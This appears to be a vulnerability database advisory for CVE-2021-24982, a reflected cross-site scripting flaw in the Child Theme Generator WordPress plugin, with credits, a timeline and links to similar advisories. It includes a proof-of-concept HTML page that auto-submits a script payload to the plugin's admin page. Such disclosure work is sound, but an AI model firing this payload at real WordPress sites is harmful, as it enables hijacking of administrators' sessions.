Child Theme Generator <= 2.2.7 – Reflected Cross-Site Scripting | CVE 2021-24982 | Plugin Vulnerabilities

Description

The plugin does not sanitise escape the parade parameter before outputting it back, leading to a Reflected Cross-Site Scripting in the admin dashboard

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=child-theme-generator"  id="hack" method="POST">
      <input type="hidden" name="hidden_field" value="1" />
      <input type="hidden" name="parent" value="<script>alert(/XSS/);</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>

Affects Plugins

child-theme-generator

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website

http://blog.szfszf.top

Submitter twitter

Verified

Yes

WPVDB ID

8e53f15e-8b6a-4d47-a40d-4ebbe6934286

Timeline

Publicly Published

2021-11-18 (about 4 years ago)

Added

2022-02-15 (about 3 years ago)

Last Updated

2022-09-26 (about 3 years ago)

Other

Published

Title

Published

2025-01-24

Title

Forminator < 1.38.3 - Admin+ Stored XSS

Published

2017-02-20

Title

rockhoist-badges 1.2.2 - Authenticated Stored Cross-Site Scripting (XSS)

Published

2024-08-06

Title

Z-Downloads < 1.11.7 - Admin+ Stored XSS via SVG Upload

Published

2024-07-09

Title

Login by Auth0 < 4.6.1 - Reflected Cross-Site Scripting via wle

Published

2025-01-16

Title

quote-posttype-plugin <= 1.2.2 - Authenticated (Contributor+) Stored Cross-Site Scripting